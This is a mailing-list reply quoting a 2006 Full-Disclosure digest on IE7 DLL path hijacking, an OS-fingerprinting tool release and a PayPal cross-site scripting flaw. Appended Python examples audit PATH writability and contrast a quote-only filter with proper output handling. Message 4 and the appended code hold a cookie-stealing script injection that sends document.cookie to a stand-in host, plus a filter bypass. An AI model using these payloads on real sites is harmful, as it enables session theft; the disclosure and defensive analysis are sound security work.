help

On 11/6/06, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote:
> Send Full-Disclosure mailing list submissions to
> full-disclosure@lists.grok.org.uk
>
> To subscribe or unsubscribe via the World Wide Web, visit
> https://lists.grok.org.uk/mailman/listinfo/full-disclosure
> or, via email, send a message with subject or body 'help' to
> [EMAIL PROTECTED]
>
> You can reach the person managing the list at
> [EMAIL PROTECTED]
>
> When replying, please edit your Subject line so it is more specific
> than "Re: Contents of Full-Disclosure digest..."
>
> Note to digest recipients - when replying to digest posts, please trim your
> post appropriately. Thank you.
>
> Today's Topics:
>
> 1. Re: Internet Explorer 7 - Still Spyware Writers' Heaven (Joshua Gimer)
> 2. SinFP 2.04 release, works under Windows (GomoR)
> 3. Re: Mail Drives Security Considerations (gabriel rosenkoetter)
> 4. Re: alert() (Matthew Flaschen)
> 5. Re: Mail Drives Security Considerations (Darkz)
> 6. Re: Internet Explorer 7 - Still Spyware Writers' Heaven (Roger A. Grimes)
>
> ----------------------------------------------------------------------
>
> Message: 1
> Date: Sat, 4 Nov 2006 13:15:35 -0700
> From: "Joshua Gimer" <[EMAIL PROTECTED]>
> Subject: Re: [Full-disclosure] Internet Explorer 7 - Still Spyware Writers' Heaven
> To: "Eliah Kagan" <[EMAIL PROTECTED]>
> Cc: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
> Message-ID: <[EMAIL PROTECTED]>
> Content-Type: text/plain; charset="iso-8859-1"
>
> If Microsoft is not planning on providing a fix for this until Vista, I can
> see a worm coming from this. Forgive me if I don't know how this works in
> the Windows world, but when it is looking for this DLL, does it take the
> first one that it finds within your path, like in UNIX? Or does it look in
> all directories within your path and then decide? I am guessing the former,
> but I am just clarifying.
>
> On 11/3/06, Eliah Kagan <[EMAIL PROTECTED]> wrote:
> >
> > On 11/2/06, Roger A. Grimes wrote:
> > > So, if your statement is accurate that malware would need to be placed
> > > in a directory identified by the PATH statement, we can relax because
> > > that would require Administrator access to pull off. Admin access would
> > > be needed to modify the PATH statement appropriately to include the
> > > user's desktop or some other new user-writable location, or Admin access
> > > would be needed to copy a file into the locations indicated by the
> > > default PATH statement.
> >
> > It would not require *administrator* access--non-administrator users
> > can still add things to their own PATHs, just not to the universal,
> > system PATH. (See Control Panel > System > Advanced > Environment
> > Variables.)
> >
> > -Eliah
>
> --
> Thx
> Joshua Gimer
> -------------- next part --------------
> An HTML attachment was scrubbed...
> URL:
> http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061104/b97c9d1d/attachment-0001.html
>
> ------------------------------
>
> Message: 2
> Date: Sun, 5 Nov 2006 20:02:28 +0100
> From: GomoR <[EMAIL PROTECTED]>
> Subject: [Full-disclosure] SinFP 2.04 release, works under Windows
> To: full-disclosure@lists.grok.org.uk
> Message-ID: <[EMAIL PROTECTED]>
> Content-Type: text/plain; charset=us-ascii
>
> Hi,
>
> I'm pleased to announce the availability of SinFP 2.04, which can now
> run under Windows ActivePerl.
>
> SinFP is a new approach to active and passive OS fingerprinting; you can
> know more about its features here:
> http://www.gomor.org/sinfp
>
> SinFP now has more than 130 signatures in its database.
>
> To be informed about new signature files, subscribe to:
> http://lists.sourceforge.net/lists/listinfo/sinfp-discuss
>
> Installation instructions can be found here:
> http://www.gomor.org/cgi-bin/index.pl?mode=view;page=sinfp#3
>
> For Windows users, follow these instructions:
>
> This was tested with ActivePerl 5.8.8.819, with PPM v4.0.
>
> # If you are behind a proxy:
> C:\> set http_proxy=http://username:[EMAIL PROTECTED]:port
>
> # Add gomor repository
> C:\> ppm repo add gomor http://www.gomor.org/files/ppm/repo-8xx
>
> # Disable all other repos, if you have many. Or only the ActiveState repo,
> # which is there by default
> C:\> ppm repo 1 off
> ...
> C:\> ppm install Net-SinFP
>
> # Re-enable all other repos
> C:\> ppm repo 1 on
> ...
>
> Launch it:
> C:\> perl C:\perl\site\bin\sinfp.pl
>
> If you have error messages about failing to load some .dll, go to
> www.microsoft.com. Then, in the search field, type in vcredist_x86.exe,
> download it and install it.
>
> Please do not hesitate to submit new signatures to sinfp_at_gomor.org,
> or on the mailing list.
>
> Best regards,
>
> --
> ^ ___ ___ http://www.GomoR.org/ <-+
> | / __ |__/ Systems & Security Engineer |
> | \__/ | \ ---[ zsh$ alias psed='perl -pe ' ]--- |
> +--> Net::Packet <=> http://search.cpan.org/~gomor/ <--+
>
> ------------------------------
>
> Message: 3
> Date: Sun, 5 Nov 2006 18:18:10 -0500
> From: gabriel rosenkoetter <[EMAIL PROTECTED]>
> Subject: Re: [Full-disclosure] Mail Drives Security Considerations
> To: full-disclosure@lists.grok.org.uk
> Message-ID: <[EMAIL PROTECTED]>
> Content-Type: text/plain; charset="us-ascii"
>
> On Fri, Nov 03, 2006 at 11:28:27AM -0500, Matthew Flaschen wrote:
> > Why can't message signing offer backwards compatibility (assuming you
> > use multipart/signed)?
>
> Seems to me that adding a PGP signature verification to every
> operation on files (even ls(1); you have to check to make sure it's
> not a spoofed file) would rather noticeably impact the
> performance of what's already got to be pretty slow on most users'
> connections, and it adds a layer of complexity to the setup (you
> have to generate the key pair, and have the private key available on
> any system on which you intend to have write access), but that would
> certainly work. Spam will still be a DoS against storage space, of course.
>
> Never mind that this software violates gmail's acceptable use
> policy and is transmitted back and forth in the clear (unless you
> want to roll PGP encryption into the mix, in which case keeping
> paths in the clear in the subject breaks the security), so it'd be
> hard to view data stored this way as being "secure" to begin with...
>
> --
> gabriel rosenkoetter
> [EMAIL PROTECTED]
> -------------- next part --------------
> A non-text attachment was scrubbed...
> Name: not available
> Type: application/pgp-signature
> Size: 189 bytes
> Desc: not available
> Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061105/669fedd5/attachment-0001.bin
>
> ------------------------------
>
> Message: 4
> Date: Sun, 05 Nov 2006 22:24:25 -0500
> From: Matthew Flaschen <[EMAIL PROTECTED]>
> Subject: Re: [Full-disclosure] alert()
> To: Matthew Flaschen <[EMAIL PROTECTED]>
> Cc: full-disclosure@lists.grok.org.uk, [EMAIL PROTECTED]
> Message-ID: <[EMAIL PROTECTED]>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Hmm, I got an email from Paypal, saying
>
> "Thank you for bringing this incident of suspicious activity to our
> attention. PayPal will investigate this activity immediately and contact
> you further if any additional information is required.[...]"
>
> I'm fairly certain they're referring to this exploit, which I CCed them
> on in my previous post.
>
> Also, the POC I posted no longer works.
> It looks like Paypal is no
> longer unescaping double quotation marks. Thus, the script fails to
> append the cookie. At any rate, just changing the double quotes to
> single quotes makes the POC work again:
>
> https://www.paypal.com/cgi-bin/webscr?cmd=xpt/popup/RandomAccessKey-outside&voice=javascript:window.location='http://fooHost/tracker.php?'%2Bdocument.cookie
>
> Matt Flaschen
>
> Matthew Flaschen wrote:
> > Good find. How about using it to steal the entire PayPal cookie, though:
> >
> > https://www.paypal.com/cgi-bin/webscr?cmd=xpt/popup/RandomAccessKey-outside&voice=javascript:window.location=%22http://fooHost/tracker.php?%22%2Bdocument.cookie;
> >
> > [EMAIL PROTECTED] wrote:
> >> https://www.paypal.com/cgi-bin/webscr?cmd=xpt/popup/RandomAccessKey-outside&voice=javascript:document.write('heh');alert('bl00p');
> >>
> >> Concerned about your privacy? Instantly send FREE secure email, no
> >> account required
> >> http://www.hushmail.com/send?l=480
> >>
> >> Get the best prices on SSL certificates from Hushmail
> >> https://www.hushssl.com?l=485
>
> -------------- next part --------------
> A non-text attachment was scrubbed...
> Name: signature.asc
> Type: application/pgp-signature
> Size: 250 bytes
> Desc: OpenPGP digital signature
> Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061105/e53d7a03/attachment-0001.bin
>
> ------------------------------
>
> Message: 5
> Date: Mon, 06 Nov 2006 10:36:10 +0200
> From: Darkz <[EMAIL PROTECTED]>
> Subject: Re: [Full-disclosure] Mail Drives Security Considerations
> To: Matthew Flaschen <[EMAIL PROTECTED]>, full-disclosure@lists.grok.org.uk
> Message-ID: <[EMAIL PROTECTED]>
> Content-Type: text/plain; charset="us-ascii"
>
> An HTML attachment was scrubbed...
> URL:
> http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061106/76d0ca99/attachment-0001.html
>
> ------------------------------
>
> Message: 6
> Date: Sun, 5 Nov 2006 22:35:25 -0500
> From: "Roger A. Grimes" <[EMAIL PROTECTED]>
> Subject: Re: [Full-disclosure] Internet Explorer 7 - Still Spyware Writers' Heaven
> To: "Eliah Kagan" <[EMAIL PROTECTED]>, <full-disclosure@lists.grok.org.uk>, <bugtraq@securityfocus.com>
> Message-ID: <[EMAIL PROTECTED]>
> Content-Type: text/plain; charset="us-ascii"
>
> So all the malware writer has to do now is figure out how to do the
> initial exploit in the first place, that would then allow them to muck
> with path statements or place code in path executable areas. I mean, do
> you get it, yet? If the malware writer figures out how to do the initial
> exploit, anything can be done, not just the path tricks.
>
> My WhereWindowsMalwareHides document
> (http://weblog.infoworld.com/securityadviser/archives/2006/05/updated_where_w.html)
> contains over 145 different tricks and locations where malware can hide
> and live, along with the path trick. Your point is a valid point, but
> it's been a known issue for years.
>
> You can't skip over the hardest part, the initial exploit, and start
> picking on one of over a hundred ways to muck with Windows users and
> call "IE 7 a Spyware Writer's Heaven".
> I mean you can, but it looks like
> you're grasping at straws. At least tell us something new, and not
> something that's been documented for years.
>
> Roger
>
> -----Original Message-----
> From: Eliah Kagan [mailto:[EMAIL PROTECTED]]
> Sent: Friday, November 03, 2006 9:26 PM
> To: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com
> Subject: Re: Internet Explorer 7 - Still Spyware Writers' Heaven
>
> On 11/2/06, Roger A. Grimes wrote:
> > So, if your statement is accurate that malware would need to be
> > placed in a directory identified by the PATH statement, we can relax
> > because that would require Administrator access to pull off. Admin
> > access would be needed to modify the PATH statement appropriately to
> > include the user's desktop or some other new user-writable location, or
> > Admin access would be needed to copy a file into the locations
> > indicated by the default PATH statement.
>
> It would not require *administrator* access--non-administrator users can
> still add things to their own PATHs, just not to the universal, system
> PATH. (See Control Panel > System > Advanced > Environment Variables.)
>
> -Eliah
>
> ------------------------------
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
> End of Full-Disclosure Digest, Vol 21, Issue 9
> **********************************************
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
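Messages 1 and 6 of the quoted digest turn on one question: can a non-administrator put a library where a bare-name lookup will find it, and does the lookup stop at the first match? The following is an added example, not code from the thread or from any of its authors. It audits a PATH-style search list from the defender's side: which entries the current account can write to, and which of those are searched before the directory that really holds a given file name, since a search of this kind takes the first hit it meets (on Windows the PATH directories are consulted last, after the application and system directories). The function names and the throwaway temporary layout built in demo() are the example's own; nothing here touches a real system directory.

```python
import os
import shutil
import tempfile


def split_path(path_value: str, sep: str = os.pathsep) -> list:
    """Split a PATH-style string into its non-empty entries, in search order."""
    return [d for d in path_value.split(sep) if d]


def is_writable_dir(directory: str) -> bool:
    """True only if the current user can really create a file in `directory`.
    A create-and-delete probe is used instead of os.access(W_OK), which on
    Windows only reports the read-only attribute and ignores the ACL."""
    if not os.path.isdir(directory):
        return False
    try:
        fd, probe = tempfile.mkstemp(prefix=".pathprobe-", dir=directory)
    except OSError:
        return False
    os.close(fd)
    os.remove(probe)
    return True


def writable_path_dirs(path_value: str, sep: str = os.pathsep) -> list:
    """PATH entries (search order kept, duplicates dropped) that the current
    user can write to: each is a place where a user-level account could drop
    a file that a later bare-name lookup would pick up."""
    seen, result = set(), []
    for d in split_path(path_value, sep):
        key = os.path.normcase(os.path.abspath(d))
        if key in seen:
            continue
        seen.add(key)
        if is_writable_dir(d):
            result.append(d)
    return result


def first_match(name: str, path_value: str, sep: str = os.pathsep):
    """First directory in search order that contains `name`, or None.
    This is the first-hit-wins rule of a PATH search."""
    for d in split_path(path_value, sep):
        if os.path.isfile(os.path.join(d, name)):
            return d
    return None


def shadowing_dirs(name: str, path_value: str, sep: str = os.pathsep) -> list:
    """Writable directories searched *before* the one that holds `name`.
    A same-named file placed in any of them would be found instead of the
    legitimate copy. If `name` is not on the path at all, every writable
    entry qualifies (the "missing library" case)."""
    hit = first_match(name, path_value, sep)
    hit_key = None if hit is None else os.path.normcase(os.path.abspath(hit))
    shadowing = []
    for d in split_path(path_value, sep):
        if hit_key is not None and os.path.normcase(os.path.abspath(d)) == hit_key:
            break
        if is_writable_dir(d):
            shadowing.append(d)
    return shadowing


def demo() -> dict:
    """Constructed sample layout in a temp tree (not a real system): 'early' is
    user-writable and searched first, 'missing' does not exist on disk, and
    'late' holds the legitimate file. Returns basenames for readability."""
    root = tempfile.mkdtemp(prefix="pathdemo-")
    try:
        early, missing, late = (os.path.join(root, n) for n in ("early", "missing", "late"))
        os.mkdir(early)
        os.mkdir(late)
        with open(os.path.join(late, "example.dll"), "wb") as f:
            f.write(b"constructed placeholder, not a real DLL")
        path_value = os.pathsep.join([early, missing, late])
        base = os.path.basename
        return {
            "writable": [base(d) for d in writable_path_dirs(path_value)],
            "first_match": base(first_match("example.dll", path_value)),
            "shadowing": [base(d) for d in shadowing_dirs("example.dll", path_value)],
            "unplaced": [base(d) for d in shadowing_dirs("nothere.dll", path_value)],
        }
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    # Audit the live PATH of the account running the script, then the sample.
    for d in writable_path_dirs(os.environ.get("PATH", "")):
        print("user-writable search directory:", d)
    print(demo())
```

Run it as the ordinary (non-administrator) account you care about, not as an administrator: the writability probe answers for whoever runs it, and the point of Eliah's remark is that a user can add entries to their own PATH, so the user-level PATH is the one to audit.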
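Message 4 of the quoted digest reports that the site's fix neutralised double quotes only, so switching the injected string to single quotes restored the behaviour. The following is an added example, not code from the thread or from PayPal. It contrasts that quote-only filter with two defender-side handlings of a reflected parameter such as `voice`, on the assumption (the example's own; the thread does not say how the parameter is used) that the value is either used as a navigation target or embedded in a JavaScript string. The two payload constants are constructed here from the decoded forms of the URLs quoted in the thread (`%22` is `"`, `%2B` is `+`); the function names are the example's own.

```python
import json
import re
from urllib.parse import urlsplit

# Constructed from the decoded query values quoted in the thread: the
# double-quote form, and the single-quote form that passed the quote-only fix.
PAYLOAD_DQ = 'javascript:window.location="http://fooHost/tracker.php?"+document.cookie'
PAYLOAD_SQ = "javascript:window.location='http://fooHost/tracker.php?'+document.cookie"


def quote_only_filter(value: str) -> str:
    """The kind of fix the thread describes: escape double quotes and nothing
    else. Any payload that avoids the double quote passes through unchanged."""
    return value.replace('"', '\\"')


ALLOWED_SCHEMES = {"http", "https"}


def safe_url_target(value: str, default: str = "/") -> str:
    """Allow-list handling for a value used as a link or redirect target.
    Assumes the web framework has already percent-decoded the parameter once.
    Control characters and whitespace are stripped first (browsers ignore
    them inside a scheme); then only absolute http(s) URLs or same-origin
    relative paths are accepted, and everything else, a javascript: URL
    included, collapses to `default` instead of being escaped."""
    cleaned = re.sub(r"[\x00-\x20\x7f]", "", value)
    parts = urlsplit(cleaned)
    if parts.scheme == "":
        # Relative path only; '//host/...' would be a protocol-relative redirect.
        if cleaned.startswith("/") and not cleaned.startswith("//"):
            return cleaned
        return default
    if parts.scheme.lower() in ALLOWED_SCHEMES and parts.netloc:
        return cleaned
    return default


def js_string_literal(value: str) -> str:
    """Encode a value for a JavaScript string context. json.dumps escapes
    double quotes, backslashes, control characters and (with the default
    ensure_ascii=True) all non-ASCII, so the U+2028/2029 line terminators
    come out as \\u escapes; the extra replacements cover single quotes and
    the HTML-significant characters, so the result is safe inside either
    quote style and inside a <script> block."""
    encoded = json.dumps(value)
    for ch, esc in (("'", "\\u0027"), ("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026")):
        encoded = encoded.replace(ch, esc)
    return encoded


if __name__ == "__main__":
    for label, payload in (("double-quote form", PAYLOAD_DQ), ("single-quote form", PAYLOAD_SQ)):
        print(label)
        print("  quote-only filter leaves it intact:", quote_only_filter(payload) == payload)
        print("  as navigation target:", safe_url_target(payload))
        print("  as JS string literal:", js_string_literal(payload))
```

The design point is that the quote-only filter is a blocklist on one character, which is why a one-character change in the payload defeated it; the two replacements either validate against a short allow-list (scheme) or encode every character that has meaning in the output context, so the quote style the attacker picks no longer matters.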